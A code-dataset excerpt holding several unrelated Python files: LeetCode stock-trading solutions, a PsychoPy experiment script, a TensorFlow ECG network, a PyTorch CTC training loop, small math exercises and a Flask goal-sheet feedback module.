Buy at valleys, just before first increase.\nSell at peaks, just before first decrease or at end.\n\nO(n) time\nO(1) extra space\n\"\"\"\nclass Solution2:\n def maxProfit(self, prices: List[int]) -> int:\n end = len(prices) - 1\n profit = 0\n i = 0\n\n while i < end:\n # Buy just before first increase (virtual buy at end).\n while i < end and prices[i] >= prices[i+1]:\n i += 1\n\n buy_price = prices[i]\n\n # Sell just before first decrease or at end.\n while i < end and prices[i] <= prices[i+1]:\n i += 1\n \n profit += prices[i] - buy_price\n\n return profit\n\n###############################################################################\n\"\"\"\nSolution 3: greedy approach. Buy at every valley (other than end) and sell at\nfirst peak after each buy. Check if previous transaction was a buy.\n\nIf a valley is part of a plateau (eg, 6, 2, 2, 4), buy at the right-most\npoint of the plateau. If a peak is part of a plateau (eg, 2, 4, 4, 1), sell\nat the right-most point of the plateau.\n\nO(n) time\nO(1) extra space\n\"\"\"\nclass Solution3:\n def maxProfit(self, prices: List[int]) -> int:\n n = len(prices)\n if n < 2:\n return 0\n\n profit = 0\n buy_price = None\n \n for i, p in enumerate(prices):\n # Buy 1st price if 2nd price is greater.\n if i == 0 and p < prices[i+1]:\n print(f\"Buy for {p}\")\n buy_price = p\n\n # Buy at end of valley if previous transaction was not a buy.\n if 0 < i < n-1 and p <= prices[i-1] and p < prices[i+1]:\n if buy_price == None:\n print(f\"Buy for {p}\")\n buy_price = p\n\n # Sell at end of peak if previous transaction was a buy.\n if (i > 0 and p >= prices[i-1]) and (i == n-1 or p > prices[i+1]):\n if buy_price != None: # could be 0\n profit += p - buy_price\n buy_price = None\n print(f\"Sell for {p}\")\n\n return profit\n\n###############################################################################\n\nif __name__ == \"__main__\":\n def test(arr, comment=None):\n print(\"=\"*80)\n if comment:\n print(comment)\n\n print(f\"\\ns = {arr}\")\n \n res = sol.maxProfit(arr)\n\n print(f\"\\nres = {res}\\n\")\n \n\n sol = Solution() # add up price increases (every interval)\n #sol = Solution2() # buy at valleys, sell at peaks\n #sol = Solution3() # buy at valleys, sell at peaks\n\n comment = \"LC ex1; answer = 7\"\n arr = [7,1,5,3,6,4]\n test(arr, comment)\n\n comment = \"LC ex2; answer = 4\"\n arr = [1,2,3,4,5]\n test(arr, comment)\n\n comment = \"LC ex2; answer = 0\"\n arr = [7,6,4,3,1]\n test(arr, comment)\n\n comment = \"LC test case; answer = 7\"\n arr = [6,1,3,2,4,7]\n test(arr, comment)\n\n comment = \"LC test case; answer = 0\"\n arr = [1]\n test(arr, comment)\n\n comment = \"LC test case; answer = 3\"\n arr = [2,2,5]\n test(arr, comment)\n\n comment = \"LC test case; answer = 20\"\n arr = [5,2,3,2,6,6,2,9,1,0,7,4,5,0]\n test(arr, comment)\n\n comment = \"LC test case; answer = 0\"\n arr = [3,3]\n test(arr, comment)\n\n comment = \"LC test case; answer = 8\"\n arr = [0,5,5,6,2,1,1,3]\n test(arr, comment)\n\n comment = \"LC test case; answer = 0\"\n arr = []\n test(arr, comment)\n ","sub_path":"greedy/0122_best_time_to_buy_and_sell_stock_ii.py","file_name":"0122_best_time_to_buy_and_sell_stock_ii.py","file_ext":"py","file_size_in_byte":5482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"81766244","text":"from __future__ import absolute_import, division\r\nfrom psychopy import locale_setup, sound, gui, visual, core, data, event, logging, clock\r\nfrom psychopy.constants import (NOT_STARTED, STARTED, 
PLAYING, PAUSED,\r\n STOPPED, FINISHED, PRESSED, RELEASED, FOREVER)\r\nimport numpy as np # whole numpy lib is available, prepend 'np.'\r\nfrom numpy import (sin, cos, tan, log, log10, pi, average,\r\n sqrt, std, deg2rad, rad2deg, linspace, asarray)\r\nfrom numpy.random import random, randint, normal, shuffle\r\nimport os # handy system and path functions\r\nimport sys # to get file system encoding\r\n\r\n# from psychopy.hardware import keyboard\r\n\r\n#\r\n# a = [np.array([[1], [2]]), np.array([[4], [5]])]\r\n# b = np.array([i for i in a[0]])\r\n# c = ['w', 'w']\r\n# d = pd.DataFrame(list(zip(b, c)), columns=['b', 'c'])\r\n# d.to_csv('scratch.csv', encoding='utf-8', index=False)\r\n# # a = [np.array([[1], [2]]), np.array([[4], [5]])]\r\n# a = data.importConditions(\"tAll_trials.csv\")\r\n# print(a)\r\n\r\n# import pandas as pd\r\n\r\n\r\n# tExp = pd.read_csv(\"tAll_trials.csv\")\r\n\r\n# count = 0\r\n# for iVar in list(tExp):\r\n# count = count + 1\r\n# if count == 3:\r\n# print(type(iVar))\r\n# iVal = tExp[iVar][0]\r\n# print(type(iVal))\r\n\r\n# # # numpy.float64\r\n# # if type(iVal) == float:\r\n# # exec(\"%s = %f\" % (iVar, iVal))\r\n# # elif type(iVal) == str:\r\n# # exec(\"%s = '%s'\" % (iVar, iVal))\r\n# if type(iVal) == str:\r\n# print(\"%s = '%s'\" % (iVar, iVal))\r\n\r\n# exec(\"%s = '%s'\" % (iVar, iVal))\r\n# else:\r\n# print(\"%s = %f\" % (iVar, iVal))\r\n# exec(\"%s = %f\" % (iVar, iVal))\r\n\r\n\r\n\r\n# Store info about the experiment session\r\npsychopyVersion = '3.1.2'\r\nexpName = 'popout_cindy' # from the Builder filename that created this script\r\nexpInfo = {'participant': '', 'session': '001'}\r\ndlg = gui.DlgFromDict(dictionary=expInfo, sortKeys=False, title=expName)\r\nif dlg.OK == False:\r\n core.quit() # user pressed cancel\r\nexpInfo['date'] = data.getDateStr() # add a simple timestamp\r\nexpInfo['expName'] = expName\r\nexpInfo['psychopyVersion'] = psychopyVersion\r\n\r\n# Data file name stem = absolute path + name; later add .psyexp, .csv, .log, etc\r\nfilename = _thisDir + os.sep + u'data/%s_%s_%s' % (expInfo['participant'], expName, expInfo['date'])\r\n\r\n# An ExperimentHandler isn't essential but helps with data saving\r\nthisExp = data.ExperimentHandler(name=expName, version='',\r\n extraInfo=expInfo, runtimeInfo=None,\r\n originPath='D:\\\\GitHub\\\\Behavior-popout-attention\\\\popout_exp0\\\\popout_cindy_lastrun.py',\r\n savePickle=True, saveWideText=True,\r\n dataFileName=filename)\r\n# save a log file for detail verbose info\r\nlogFile = logging.LogFile(filename+'.log', level=logging.EXP)\r\nlogging.console.setLevel(logging.WARNING) # this outputs to the screen, not a file\r\n\r\nendExpNow = False # flag for 'escape' or other condition => quit the exp\r\n\r\n# Start Code - component code to be run before the window creation\r\n\r\n# Setup the Window\r\nwin = visual.Window(\r\n size=[2048, 1152], fullscr=True, screen=0,\r\n winType='pyglet', allowGUI=False, allowStencil=False,\r\n monitor='testMonitor', color=[0,0,0], colorSpace='rgb',\r\n blendMode='avg', useFBO=True)\r\n# store frame rate of monitor if we can measure it\r\nexpInfo['frameRate'] = win.getActualFrameRate()\r\nif expInfo['frameRate'] != None:\r\n frameDur = 1.0 / round(expInfo['frameRate'])\r\nelse:\r\n frameDur = 1.0 / 60.0 # could not measure, so guess\r\n\r\n# create a default keyboard (e.g. 
to check for escape)\r\n# defaultKeyboard = keyboard.Keyboard()\r\n\r\n# Initialize components for Routine \"instr\"\r\ninstrClock = core.Clock()\r\ntBlank_text = ''\r\nCindy_num_blocks_finished = 0\r\n\r\nMyExps = data.TrialHandler(nReps=1, method='random',\r\n extraInfo=expInfo, originPath=-1,\r\n trialList=data.importConditions('tExp.csv'),\r\n seed=None, name='MyExps')\r\nthisExp.addLoop(MyExps) # add the loop to the experiment\r\nthisMyExp = MyExps.trialList[0] # so we can initialise stimuli with some values\r\n# abbreviate parameter names if possible (e.g. rgb = thisMyExp.rgb)\r\nif thisMyExp != None:\r\n print(thisMyExp)\r\n for paramName in thisMyExp:\r\n print(paramName)\r\n print(format(paramName))\r\n exec('{} = thisMyExp[paramName]'.format(paramName))","sub_path":"scratch.py","file_name":"scratch.py","file_ext":"py","file_size_in_byte":4405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"124618331","text":"\"\"\"\ndeep_ecg_v4.py\n--------------\nThis module provides a class and methods for building a convolutional neural network with tensorflow.\nBy: Sebastian D. Goodfellow, Ph.D., 2018\n\"\"\"\n\n# Compatibility imports\nfrom __future__ import absolute_import, division, print_function\n\n# 3rd party imports\nimport numpy as np\nimport tensorflow as tf\nfrom sklearn.metrics import f1_score\n\n# Local imports\nfrom deepecg.training.train.disc.data_generator import DataGenerator\nfrom deepecg.training.networks.layers import fc_layer, conv_layer, max_pool_layer, avg_pool_layer, \\\n batch_norm_layer, dropout_layer, print_output_shape\n\n\nclass DeepECGV4(object):\n\n \"\"\"\n Build the forward propagation computational graph for an Inception-V4 and ResNet inspired deep neural network.\n\n Szegedy, C., Ioffe, S., Vanhoucke, V. (2016) Inception-v4, inception-resnet and the impact of residual\n connections on learning (2016). 
arXiv:1602.07261\n \"\"\"\n\n def __init__(self, length, channels, classes, seed=0):\n\n # Set input parameters\n self.length = length\n self.channels = channels\n self.classes = classes\n self.seed = seed\n\n def inference(self, input_layer, reuse, is_training, name, print_shape=True):\n \"\"\"Forward propagation of computational graph.\"\"\"\n # Check input layer dimensions\n assert input_layer.shape[1] == self.length\n assert input_layer.shape[2] == self.channels\n\n # Define a scope for reusing the variables\n with tf.variable_scope(name, reuse=reuse):\n\n \"\"\"Block Series 1\"\"\"\n # --- Layer 1 (Convolution) ------------------------------------------------------------------------------ #\n\n # Set name\n layer_name = 'layer_1'\n\n # Set layer scope\n with tf.variable_scope(layer_name):\n # Convolution\n net = conv_layer(input_layer=input_layer, kernel_size=24, strides=1, dilation_rate=1,\n filters=128, padding='SAME', activation=tf.nn.relu, use_bias=True,\n name=layer_name + '_conv_ks3_dr1', seed=self.seed)\n\n # Max pool\n net = max_pool_layer(input_layer=net, pool_size=3, strides=2, padding='SAME',\n name=layer_name + '_maxpool_ps3')\n\n # Print shape\n print_output_shape(layer_name=layer_name, net=net, print_shape=print_shape)\n\n # --- Layer 2 (Convolution) ------------------------------------------------------------------------------ #\n\n # Set name\n layer_name = 'layer_2'\n\n # Set layer scope\n with tf.variable_scope(layer_name):\n # Convolution\n net = conv_layer(input_layer=net, kernel_size=12, strides=1, dilation_rate=2,\n filters=128, padding='SAME', activation=tf.nn.relu, use_bias=True,\n name=layer_name + '_conv_ks3_dr1', seed=self.seed)\n\n # Print shape\n print_output_shape(layer_name=layer_name, net=net, print_shape=print_shape)\n\n # --- Layer 3 (Convolution) ------------------------------------------------------------------------------ #\n\n # Set name\n layer_name = 'layer_3'\n\n # Set layer scope\n with tf.variable_scope(layer_name):\n # Convolution\n net = conv_layer(input_layer=net, kernel_size=12, strides=1, dilation_rate=1,\n filters=128, padding='SAME', activation=tf.nn.relu, use_bias=True,\n name=layer_name + '_conv_ks3_dr1', seed=self.seed)\n\n # Max pool\n net = max_pool_layer(input_layer=net, pool_size=3, strides=2, padding='SAME',\n name=layer_name + '_maxpool_ps3')\n\n # Dropout\n net = dropout_layer(input_layer=net, drop_rate=0.3, seed=self.seed, training=is_training,\n name=layer_name + '_dropout')\n\n # Print shape\n print_output_shape(layer_name=layer_name, net=net, print_shape=print_shape)\n\n \"\"\"Block Series 2\"\"\"\n # --- Layer 4 (Convolution) ------------------------------------------------------------------------------ #\n\n # Set name\n layer_name = 'layer_4'\n\n # Set layer scope\n with tf.variable_scope(layer_name):\n # Convolution\n net = conv_layer(input_layer=net, kernel_size=6, strides=1, dilation_rate=4,\n filters=256, padding='SAME', activation=tf.nn.relu, use_bias=True,\n name=layer_name + '_conv_ks3_dr1', seed=self.seed)\n\n # Print shape\n print_output_shape(layer_name=layer_name, net=net, print_shape=print_shape)\n\n # --- Layer 5 (Convolution) ------------------------------------------------------------------------------ #\n\n # Set name\n layer_name = 'layer_5'\n\n # Set layer scope\n with tf.variable_scope(layer_name):\n # Convolution\n net = conv_layer(input_layer=net, kernel_size=6, strides=1, dilation_rate=1,\n filters=256, padding='SAME', activation=tf.nn.relu, use_bias=True,\n name=layer_name + '_conv_ks3_dr1', 
seed=self.seed)\n\n # Print shape\n print_output_shape(layer_name=layer_name, net=net, print_shape=print_shape)\n\n # --- Layer 6 (Convolution) ------------------------------------------------------------------------------ #\n\n # Set name\n layer_name = 'layer_6'\n\n # Set layer scope\n with tf.variable_scope(layer_name):\n # Convolution\n net = conv_layer(input_layer=net, kernel_size=6, strides=1, dilation_rate=8,\n filters=256, padding='SAME', activation=tf.nn.relu, use_bias=True,\n name=layer_name + '_conv_ks3_dr1', seed=self.seed)\n\n # Max pool\n net = max_pool_layer(input_layer=net, pool_size=3, strides=2, padding='SAME',\n name=layer_name + '_maxpool_ps3')\n\n # Dropout\n net = dropout_layer(input_layer=net, drop_rate=0.3, seed=self.seed, training=is_training,\n name=layer_name + '_dropout')\n\n # Print shape\n print_output_shape(layer_name=layer_name, net=net, print_shape=print_shape)\n\n \"\"\"Block Series 3\"\"\"\n # --- Layer 7 (Convolution) ------------------------------------------------------------------------------ #\n\n # Set name\n layer_name = 'layer_7'\n\n # Set layer scope\n with tf.variable_scope(layer_name):\n # Convolution\n net = conv_layer(input_layer=net, kernel_size=3, strides=1, dilation_rate=1,\n filters=512, padding='SAME', activation=tf.nn.relu, use_bias=True,\n name=layer_name + '_conv_ks3_dr1', seed=self.seed)\n\n # Print shape\n print_output_shape(layer_name=layer_name, net=net, print_shape=print_shape)\n\n # --- Layer 8 (Convolution) ------------------------------------------------------------------------------ #\n\n # Set name\n layer_name = 'layer_8'\n\n # Set layer scope\n with tf.variable_scope(layer_name):\n # Convolution\n net = conv_layer(input_layer=net, kernel_size=3, strides=1, dilation_rate=16,\n filters=512, padding='SAME', activation=tf.nn.relu, use_bias=True,\n name=layer_name + '_conv_ks3_dr1', seed=self.seed)\n\n # Print shape\n print_output_shape(layer_name=layer_name, net=net, print_shape=print_shape)\n\n # --- Layer 9 (Convolution) ------------------------------------------------------------------------------ #\n\n # Set name\n layer_name = 'layer_9'\n\n # Set layer scope\n with tf.variable_scope(layer_name):\n # Convolution\n net = conv_layer(input_layer=net, kernel_size=3, strides=1, dilation_rate=1,\n filters=512, padding='SAME', activation=tf.nn.relu, use_bias=True,\n name=layer_name + '_conv_ks3_dr1', seed=self.seed)\n\n # Dropout\n net = dropout_layer(input_layer=net, drop_rate=0.3, seed=self.seed, training=is_training,\n name=layer_name + '_dropout')\n\n # Print shape\n print_output_shape(layer_name=layer_name, net=net, print_shape=print_shape)\n\n \"\"\"Block Series 4\"\"\"\n # --- Layer 10 (Convolution) ----------------------------------------------------------------------------- #\n\n # Set name\n layer_name = 'layer_10'\n\n # Set layer scope\n with tf.variable_scope(layer_name):\n # Convolution\n net = conv_layer(input_layer=net, kernel_size=3, strides=1, dilation_rate=32,\n filters=512, padding='SAME', activation=tf.nn.relu, use_bias=True,\n name=layer_name + '_conv_ks3_dr1', seed=self.seed)\n\n # Print shape\n print_output_shape(layer_name=layer_name, net=net, print_shape=print_shape)\n\n # --- Layer 11 (Convolution) ----------------------------------------------------------------------------- #\n\n # Set name\n layer_name = 'layer_11'\n\n # Set layer scope\n with tf.variable_scope(layer_name):\n # Convolution\n net = conv_layer(input_layer=net, kernel_size=3, strides=1, dilation_rate=1,\n filters=512, padding='SAME', 
activation=tf.nn.relu, use_bias=True,\n name=layer_name + '_conv_ks3_dr1', seed=self.seed)\n\n # Print shape\n print_output_shape(layer_name=layer_name, net=net, print_shape=print_shape)\n\n # --- Layer 12 (Convolution) ----------------------------------------------------------------------------- #\n\n # Set name\n layer_name = 'layer_12'\n\n # Set layer scope\n with tf.variable_scope(layer_name):\n # Convolution\n net = conv_layer(input_layer=net, kernel_size=3, strides=1, dilation_rate=64,\n filters=512, padding='SAME', activation=tf.nn.relu, use_bias=True,\n name=layer_name + '_conv_ks3_dr1', seed=self.seed)\n\n # Dropout\n net = dropout_layer(input_layer=net, drop_rate=0.3, seed=self.seed, training=is_training,\n name=layer_name + '_dropout')\n\n # Print shape\n print_output_shape(layer_name=layer_name, net=net, print_shape=print_shape)\n\n \"\"\"Network Output\"\"\"\n # --- Global Average Pooling Layer ----------------------------------------------------------------------- #\n\n # Set name\n layer_name = 'gap'\n\n # Set layer scope\n with tf.variable_scope(layer_name):\n # Reduce mean along dimension 1\n gap = tf.reduce_mean(input_tensor=net, axis=1)\n\n # Print shape\n print_output_shape(layer_name=layer_name, net=gap, print_shape=print_shape)\n\n # --- Softmax Layer -------------------------------------------------------------------------------------- #\n\n # Set name\n layer_name = 'logits'\n\n # Softmax activation\n logits = fc_layer(input_layer=gap, neurons=self.classes, activation=None, use_bias=False,\n name=layer_name, seed=self.seed)\n\n # Print shape\n print_output_shape(layer_name=layer_name, net=logits, print_shape=print_shape)\n\n # Compute Class Activation Maps\n cams = self._get_cams(net=net, is_training=is_training)\n\n return logits, net, cams\n\n def _get_cams(self, net, is_training):\n \"\"\"Collect class activation maps (CAMs).\"\"\"\n # Empty list for class activation maps\n cams = dict()\n\n # Compute class activation map\n if is_training is not None:\n for label in range(self.classes):\n cams[label] = self._compute_cam(net=net, label=label)\n\n return cams\n\n def _compute_cam(self, net, label):\n \"\"\"Compute class activation map (CAM) for specified label.\"\"\"\n # Compute logits weights\n weights = self._get_logit_weights(net=net, label=label)\n\n # Compute class activation map\n cam = tf.matmul(net, weights)\n\n return cam\n\n def _get_logit_weights(self, net, label):\n \"\"\"Get logits weights for specified label.\"\"\"\n # Get number of filters in the final output\n num_filters = int(net.shape[-1])\n\n with tf.variable_scope('logits', reuse=True):\n weights = tf.gather(tf.transpose(tf.get_variable('kernel')), label)\n weights = tf.reshape(weights, [-1, num_filters, 1])\n\n # Reshape weights\n weights = self._reshape_logit_weights(net=net, weights=weights)\n\n return weights\n\n @staticmethod\n def _reshape_logit_weights(net, weights):\n \"\"\"Reshape logits shapes to batch size for multiplication with net output.\"\"\"\n return tf.tile(input=weights, multiples=[tf.shape(net)[0], 1, 1])\n\n def create_placeholders(self):\n \"\"\"Creates place holders: waveform and label.\"\"\"\n with tf.variable_scope('waveform') as scope:\n waveform = tf.placeholder(dtype=tf.float32, shape=[None, self.length, self.channels], name=scope.name)\n\n with tf.variable_scope('label') as scope:\n label = tf.placeholder(dtype=tf.int32, shape=[None], name=scope.name)\n\n return waveform, label\n\n def create_generator(self, path, mode, batch_size):\n \"\"\"Create data generator 
graph operation.\"\"\"\n return DataGenerator(path=path, mode=mode, shape=[self.length, self.channels],\n batch_size=batch_size, prefetch_buffer=1500, seed=0, num_parallel_calls=32)\n\n @staticmethod\n def compute_accuracy(logits, labels):\n \"\"\"Computes the model accuracy for set of logits and labels.\"\"\"\n with tf.variable_scope('accuracy'):\n return tf.reduce_mean(tf.cast(tf.equal(tf.argmax(logits, axis=1), tf.cast(labels, tf.int64)), 'float'))\n\n def compute_f1(self, logits, labels):\n \"\"\"Computes the model f1 score for set of logits and labels.\"\"\"\n with tf.variable_scope('f1'):\n\n # Get prediction\n predictions = tf.cast(tf.argmax(logits, axis=1), tf.int32)\n\n # Get label\n labels = tf.cast(labels, tf.int32)\n\n return tf.py_func(func=self._compute_f1, inp=[predictions, labels], Tout=[tf.float64])\n\n @staticmethod\n def _compute_f1(predictions, labels):\n \"\"\"Compute the mean f1 score.\"\"\"\n return np.mean(f1_score(labels, predictions, labels=[0, 1, 2, 3], average=None)[0:3])\n\n","sub_path":"deepecg/training/networks/deep_ecg_v4.py","file_name":"deep_ecg_v4.py","file_ext":"py","file_size_in_byte":15509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"293345773","text":"import argparse\n\nimport matplotlib.pyplot as plt\nimport sys\nimport time\nimport torch\nimport torch.nn as nn\nfrom torch.utils.data import DataLoader\n\nfrom model.my_lstm import CustomLSTM\nfrom model.simple_mdlstm import SimpleModelMDLSTM\nfrom model.simple_model import SimpleModel\nfrom utils.image_helper import CustomDataSetSimple\nfrom utils.tensor_helper import to_best_device, do_load_model\n\nparser = argparse.ArgumentParser(description='Train the model.')\nparser.add_argument('--data', dest='data_path',\n help='Path to the folder containing training data', required=True)\nparser.add_argument('--models', dest='models_path',\n help='Path to the folder containing the models (load and save)', required=True)\nparser.add_argument('--epoch', dest='epoch', default=10,\n help='Path to the folder containing training data')\nparser.add_argument('--batch', dest='batch', default=10,\n help='Number of images per batch')\nparser.add_argument('--height', dest='height', default=80,\n help='Height of source images')\nparser.add_argument('--width', dest='width', default=80,\n help='Width of source images')\nparser.add_argument('--sentence', dest='sentence', default=10,\n help='Max length of sentences')\nparser.add_argument('--lr', dest='lr', default=0.0001,\n help='Learning rate')\nparser.add_argument('--max-lr', dest='max_lr', default=0.1,\n help='Max learning rate')\nparser.add_argument('--load', dest='load', default=False,\n help='Load model if true')\nparser.add_argument('--feat-mul', dest='feat_mul', default=15,\n help='Load model if true')\nargs = parser.parse_args()\n\ndata_path = args.data_path\nmodels_rep = args.models_path\nload_model = 'True' == args.load\nNUM_EPOCHS = int(args.epoch)\nBATCH_SIZE = int(args.batch)\nMOMENTUM = 0.9\nMAX_SENTENCE_LENGTH = int(args.sentence)\nLEARNING_RATE = float(args.lr)\nMAX_LR = float(args.max_lr)\nfeatures_multiplicity = int(args.feat_mul)\n\nif torch.cuda.is_available():\n print(\"CUDA will be used\")\nelse:\n print(\"CUDA won't be used\")\n\ndef imshow(inp):\n inp = inp.numpy()[0]\n mean = 0.1307\n std = 0.3081\n inp = ((mean * inp) + std)\n plt.imshow(inp, cmap='gray')\n plt.show()\n\nprint(f\"Loading dataset ...\")\nds = CustomDataSetSimple(nb_digit=MAX_SENTENCE_LENGTH, 
nb_samples=1000)\n#imshow(ds[5][0])\n#exit()\nprint(f\"...dataset loaded\")\ndataloader = DataLoader(ds, batch_size=int(len(ds) / 3), shuffle=True)\nmodel = to_best_device(SimpleModel())\nbest_model = to_best_device(SimpleModel())\n\n\nif load_model:\n if not do_load_model(models_rep, model):\n model.initialize_weights()\nelse:\n model.initialize_weights()\n\nmodel.train()\nloss = to_best_device(nn.CTCLoss(blank=10, zero_infinity=True, reduction=\"sum\"))\noptimizer = torch.optim.AdamW(model.parameters(), lr=LEARNING_RATE)\nscheduler = torch.optim.lr_scheduler.OneCycleLR(optimizer,\n max_lr=MAX_LR,\n steps_per_epoch=int(len(dataloader)),\n epochs=NUM_EPOCHS,\n anneal_strategy='linear')\nstart = time.time()\nlosses = []\nmin_loss = sys.maxsize\ndo_save = True\nfor epoch in range(NUM_EPOCHS):\n running_loss = 0.0\n for i, batch_data in enumerate(dataloader):\n data_cpu, labels_cpu = batch_data\n data = to_best_device(data_cpu)\n labels = to_best_device(labels_cpu)\n optimizer.zero_grad()\n outputs = model(data)\n # Because outputs is of dimension (batch_size, seq, nb_chars) we have to permute the dimensions to fit cttloss\n # expected inputs\n outputs = outputs.permute(1, 0, 2) # seq, batch_size, nb_chars = outputs.shape\n bs = len(data)\n curr_loss = loss(nn.functional.log_softmax(outputs, 2), labels.flatten(),\n torch.tensor(bs * [outputs.shape[0]], dtype=torch.long),\n torch.tensor([len(label) for label in labels], dtype=torch.long))\n curr_loss.backward()\n optimizer.step()\n scheduler.step()\n running_loss += curr_loss.item()\n print(f'[{epoch}]Loss is {running_loss}')\n losses.append(running_loss)\n if running_loss < min_loss:\n do_save = True\n best_model.load_state_dict(model.state_dict())\n min_loss = running_loss\n else:\n if do_save:\n print(f'[{epoch}] Best loss so far is {min_loss} so we will save in best')\n torch.save(best_model.state_dict(), f\"{models_rep}/best.pt\")\n do_save = False\nend = time.time()\nprint(f\"It took {end - start}\")\nif do_save:\n print(f'[END] Best loss was {min_loss} so we will save in best')\n torch.save(best_model.state_dict(), f\"{models_rep}/best.pt\")\nplt.plot(losses)\nplt.show()\n","sub_path":"src/train_simple.py","file_name":"train_simple.py","file_ext":"py","file_size_in_byte":4907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"323855120","text":"def nwd(x,y):\n tmp=0\n while y!=0:\n tmp = y\n y = x % y\n x = tmp\n return x\n\n\ndef nww(x,y):\n return x*int((y/nwd(x,y)))\n\nx, y, z= [int(x) for x in input(\"x y z: \").split()]\n\nprint( nww( nww(x,y),z ) )","sub_path":"wdi-1/13.py","file_name":"13.py","file_ext":"py","file_size_in_byte":230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"223075814","text":"#!/usr/bin/env python\n\nimport random\n\nlist1 = []\nlist2 = []\nlist3 = []\nfor i in range(10):\n e = random.randrange(0,21)\n list1.append(e)\n\nfor i in list1:\n if list1.count(i) == 1:\n list2.append(i)\n else:\n if list3.count(i) == 0:\n list3.append(i)\n\nprint(list2)\nprint(list3)\nprint(list1)\n","sub_path":"P17083-贾璐/learn/list_training1-4.py","file_name":"list_training1-4.py","file_ext":"py","file_size_in_byte":321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"329944484","text":"\"\"\"\nK.Srinivas, 18-Jul-2018\n\nProject: Goal Sheet\nDescription: \n\nKNOWN BUGs: None\n\"\"\"\nimport logging\nimport json\nfrom flask_wtf import FlaskForm \nfrom wtforms import 
*\nfrom wtforms.validators import required, DataRequired, Length\nfrom flask_login import login_required, current_user\nfrom wtforms.fields import StringField, SelectField\nfrom wtforms.widgets import TextArea\nfrom flask import Flask, url_for\n#ForFileUpload\nfrom flask import send_from_directory, render_template, redirect, request, flash, session\nfrom werkzeug import secure_filename\nfrom flask_sqlalchemy import SQLAlchemy\nfrom goalmodel import *\nfrom realapp import app, db\nfrom goaldomain import *\nimport os\nfrom hrmsdomain import *\nimport datetime as dt\nfrom dateutil import parser\nfrom goalflags import * \nfrom hrmsempdata import getEmpDictbyEmail, getEmpDictbyEmpid\nfrom feedbackdomain import *\nfrom feedbackmodel import *\n\n\n##########################################################################################################################\n#### Display/Edit Goal-Sheet for end user ##############################\n#Key screen allowing an employee to see this goals, set-his targets and send for approval\n#Once Approved, He/She can only update tasks\n@app.route('/goals/feedbackviewmanager', methods=['GET'])\n@login_required #Without login, we don't know who it is\ndef feedbackViewManager( year = '2018-2019') :\n year = session['year']\n if not current_user.is_admin and not current_user.is_dclead and not current_user.is_Manager :\n return render_template('goalsheet/message.html', message = \"You are not authorized to access this page.\")\n loggedInEmpEmail = current_user.username.lower()\n loggedInEmpId = getEmpIdIntByEmail(loggedInEmpEmail)\n\n empIdStr = request.args.get('empid') \n if empIdStr and empIdStr.isdigit() : # If employee ID was n\n empId = int(empIdStr)\n else :\n return render_template('goalsheet/message.html', message = \"Internal Error.Please contact support with this message: Invalid empIdStr:\" + str(empIdStr))\n return feedbackViewGeneric(empId,loggedInEmpId, loggedInEmpEmail,\\\n current_user.is_admin , year, managerPage=True)\n\n\n@app.route('/goals/feedbackview', methods=['GET'])\n@login_required #Without login, we don't know who it is\ndef feedbackView( year = '2018-2019') :\n year = session['year']\n\n loggedInEmpEmail = current_user.username.lower()\n loggedInEmpId = getEmpIdIntByEmail(loggedInEmpEmail)\n return feedbackViewGeneric(loggedInEmpId,loggedInEmpId, loggedInEmpEmail, current_user.is_admin , year)\n\ndef feedbackViewGeneric(empId,loggedInEmpId, loggedInEmpEmail,is_admin, year, managerPage=False ) :\n loginedInEmpId = getEmpIdIntByEmail(loggedInEmpId)\n empDict = getEmpDictbyEmpid(str(empId))\n empEmail = empDict['OFFICE_EMAIL_ID']\n\n #Get list of Goals, group-by-sectio\n (sheet, allgoalsections, allgoals ) = getAllGoalsAndSections(empId, year)\n # Get All the Tasks for these goals, grouped nicely by goal-ID\n if not sheet :\n return render_template('goalsheet/message.html', message = \"No Goals have been Assigned. 
Please contact your DC Lead.\")\n msgDict = getEmpDictbyEmpid(sheet.assessingManager)\n\n empInfo = getGoalSheetHeader(empEmail, year)\n empInfo['Manager'] = msgDict[\"FIRST_NAME\"] + ' ' + msgDict[\"LAST_NAME\"]\n \n alltasks = getAllTasks(allgoals)\n\n #Set Authorization level = Check if its own item or someone else\n ownItem = False\n if (loginedInEmpId == sheet.empId) :\n ownItem = True\n authlevel = getAuthLevel(loggedInEmpId, ownItem, is_admin) # Get Auth Level\n #getComments\n (allSheetComments, allGoalComments, allTaskComments) = getAllComments(empId,sheet, allgoals, alltasks, authLevel = authlevel)\n #Render\n template = 'goalsheet/goalfeedback.html'\n if managerPage : template = 'goalsheet/goalfeedbackmanager.html'\n return render_template(template, goalSheet = sheet,\\\n goalSections = allgoalsections, \\\n goals = allgoals, alltasks=alltasks, empInfo = empInfo, \\\n sheetCmnts = allSheetComments, goalCmnts = allGoalComments, \\\n taskCmnts = allTaskComments, num=len(allgoalsections))\n\n\n\n\n#TODO: Visibility LEVEL needs to be implemented. For now, emp-visibility needs to be True\n@app.route('/goals/getTaskEmpFeedback', methods=['GET'])\n@login_required #Without login, we don't know who it is\ndef getTaskEmpFeedback(year = '2018-2019') :\n year = session['year']\n\n empEmail = current_user.username.lower()\n loginedInEmpId = getEmpIdIntByEmail(empEmail)\n# print(\"loginedInEmpId:\" + str(loginedInEmpId))\n taskIdStr = request.args.get('Task_id')\n if taskIdStr.isdigit() :\n tId = int(taskIdStr)\n else:\n return (\"Invalid Task\")\n alltfs = GoalFeedback.query.filter_by(elementId = tId). \\\n filter_by(visibleToEmp = True). \\\n filter_by(elementType = 3). \\\n all()\n# print(\"No. of comments: \" + str(len(alltfs)))\n mydict = {str(o.id) : (o.dateRecorded.strftime(\"%d-%m-%y\") , o.feedback) for o in alltfs }\n# print(mydict)\n return (json.dumps(mydict))\n \n\n##################################################################################################\n##################################################################################################\n# To be deleted later after testing -Srini\n##################################################################################################\n##################################################################################################\n##################################################################################################\n##################################################################################################\n# @app.route('/goals/xxxfeedbackview', methods=['GET'])\n# @login_required #Without login, we don't know who it is\n# def xxxfeedbackView( year = '2018-2019') :\n# empIdStr = 